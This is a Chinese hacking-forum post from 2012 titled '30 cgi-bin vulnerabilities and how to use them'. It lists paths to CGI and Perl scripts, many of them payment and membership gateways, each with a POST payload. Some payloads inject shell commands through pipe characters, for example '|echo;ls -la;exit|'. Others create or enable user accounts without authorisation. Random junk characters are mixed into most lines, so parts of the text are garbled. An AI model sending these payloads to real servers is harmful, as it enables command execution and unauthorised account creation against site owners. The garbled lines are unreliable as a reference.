找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2424|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
==============================. v0 i) @/ c! L  y$ ]$ n: f
8 ^, S( x+ |" ]7 Z6 v( K' v0 |! V7 v
/smspass.pl
8 S& n; C: ]6 G. O: A: P" @username=username&password=password
* S& i* e/ w; ^- [) E/ t7 v5 b6 c  D, f1 e% E1 b
/index.cgi
/ l2 l1 q, Q) ?. v8 {wei=ren&gen=command
  W" t4 J* C3 X5 V2 Q( J7 [
( r& ~6 J# _1 Z4 E/passmaster.cgi" B! {* t1 {3 P0 N4 X! U3 g$ V
Action=Add&Username=Username&Password=Password& ^. H" H3 A- b% m
  I0 Y5 @. u5 s# L' Q
/accountcreate.cgi
# F& {! ~7 A) ?7 _. K1 y. l( I! e) P8 Zusername=username&password=password&ref1=|echo;ls|
; p& p7 }% M5 n; s. J) T! P" l$ [% ]
/form.cgi5 y, Y0 @' L+ p3 @/ H
name=xxxx&email=email&subject=xxxx&response=|echo;ls|, T. X% R7 M! [% y# L1 C  e% Z. M# M

  N* k+ Z0 d3 V+ T+ u* Z  R/ C/addusr.pl
$ y% `4 V  Z5 T+ [0 B/cgi-bin/EuroDebit/addusr.pl9 B9 I* e, i' @4 K
user=username&pass=Password&confirm=Password# n+ q4 ^9 t, L, U3 G# b! J

: n  M! Z1 Z; g1 A/ccbill-local.asp# a4 ?1 E7 b2 y4 I' b
post_values=username:password
: z  q) U% j# x( X  N. \: V( V- J) ?9 s1 l2 z
/count.cgi
0 I% w, Q9 ~, X6 E: opinfile=|echo;ls -la;exit|' h5 f& z' A0 c3 `

0 T7 ~  G& p: _  p/recon.cgi
/ Z+ D3 P' S6 _* e/recon.cgi?search+ g, v2 h8 F7 u2 u1 l
searchoption=1&searchfor=|echo;ls -al;exit|3 f! f4 d6 p5 P
9 U4 w( @# M. M+ ~, o- T# N# n
/verotelrum.pl0 u$ C2 |6 e. F6 _! p4 P. {, O, @
vercode=username:password:dseegsow:add:amount<&30>' n$ r2 Y9 b4 ^2 _6 U

: H$ O  E' r+ C& ^/af.cgi) ^4 G; Y& E' T' U! q- Q' V
_browser_out=|echo;ls -la;exit;|
. q8 e$ S" X; C; x, \7 P! N
) z3 j( y+ K, T8 z6 u5 v7 i5 V/modify.cgi
9 t$ r# o1 ^! s4 f& M: O" yusername=username&password=password&expire=309 ^# X, G3 O% p( {. C9 V1 n+ O

# o! `; ?# A4 u/openjournal.cgi
: ?6 Z. z' E! p' x- vedit=1&ct=2&go=|echo;ls -al;exit|4 D" n; j0 A3 _4 ~+ t$ k2 ^# ?( ?; F

# w# @3 ?& D' _% \/ k/gx9passwd.cgi
6 r" _: T. B# ]! ~! lcmd=ADD&user=username&pass=password
& c2 t( Z, W7 C) W: I# z
7 B1 t0 }) [5 C/probecontrol.cgi
. T; z* s8 u  \2 G  Ocommand=enable&username=username&password=password
3 v9 V% i% z# F2 @* S( ?/ p
$ G) I& `# G% O6 A; Z/recon.cgi
# |+ h# ^) K" w- B9 E2 Asearchoption=3&searchfor=echo;ls -la;exit
% K: E) Q0 w4 t8 O" R* i9 z9 Z3 _' z- \0 q) |4 C) I" Z
/htadd.pl" \, B0 y, w& o- ?
configfile=|echo; ls -alt; exit8 \, {3 P. e+ z2 x' R! z% j" F" n' f* s

$ a, o- f2 K3 {+ t8 c/gx9passwd.cgi
/ O9 ^" A0 M, G5 M1 {) g0 [" {. vcmd=ADD&user=username&pass=password
: e# H" z2 w( ]# J: r) G
: F# C3 ~% H- O" y" ^5 w0 F) A/ibill*.pl
) s8 O* w% D8 u! p; oreqtype=add&authpwd=authpwd&username=username&password=password
, B  S/ p. n! E! W* J8 J+ H' D$ @  Y5 h0 @
/cpay.cgi' z1 ~0 Y) x" C; p. C1 j- }
command=add_member&username=username(EMAIL)&password=password(DES)
, S9 j2 x8 K! ]4 |0 n% {8 [0 {4 @8 T2 w4 ^/ ]6 b; I- J8 y1 j
/globill_ut.cgi
1 o- d  h5 o% _9 N3 y5 Vdo=add&username=username&password=password&wpassword=password
6 s2 ^5 `$ C" `
/ E3 I% i5 E# H/ v7 A6 Y4 u7 C/usercontrol.cgi7 f# x1 u% N6 F
command=enable&username=USER&password=PASS
2 E  W. z: Q7 R$ W5 I" c; C- @3 x* _$ \6 D* p- ^
/globoSALErum.cgi
6 U2 T, S9 r% }' C+ _% ~action=ADD&seccode=seccode&login=username&password=password
  G3 S& g: h4 [8 i% r
( C+ f/ {: s8 ?% q( _: \/addusr.pl: {/ p" v9 J+ X9 U5 @
user=USER&pass=PASS&confirm=PASS# B8 h/ k# \# ]2 [5 B+ g% e; F8 X
6 i& s7 i5 ~+ P' V% t* O
/pincount.cgi/ ~4 u2 }7 r- Q% c6 ?8 K% `
/cgi-bin/mastergate/pincount.cgi( {8 b. x. f1 Y( a2 g) C% U
pinfile=|echo;pwd;exit|
5 ~2 |3 A. Q. m8 G0 H; G  k+ s& g& P. `3 K: s& f
/accountcreate.cgi" `# Q8 S% u  e3 b; k
/cgi-bin/gateway/accountcreate.cgi$ ^/ s9 f5 p) l+ I: X5 r
username=username&password=password&password2=password&ref1=|echo;ls -al;exit+ S; i4 N5 B* _6 f9 Q! M8 h3 k& i
/ z8 Z7 l; B* \) w6 a
/af.cgi
' \$ \/ H/ b! i( f/env.cgi' a7 S( a4 b+ r  ~$ v$ M' j0 q
ADD+;echo;pwd;exit
( O5 ]3 ^- [& s' Z/ J) r# \
0 \( L, |2 v, p; L/count.cgi
  q- d. d( o% D( Mpinfile=|echo;pwd;exit|* h3 z) T  S* O* S1 a. [( l! k

6 U2 E* D( t0 I; r1 Y/recon.cgi
( u9 B! z7 @, t! ksearchoption=1&searchfor=|echo;ls%20-al;exit|
; S4 D/ o- l9 Y; V& u2 C' U  H) D% B& i! R$ s" u% W
/add.cgi
: y0 \" j" s% B/ ~: l. E8 A) V5 }username=username&password=password&expire=30
3 Q$ _' w) c) v. y4 w
& v/ l" j, `$ |' A0 k2 g9 f4 Y==============================
) P7 t% ?6 o7 n& \
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表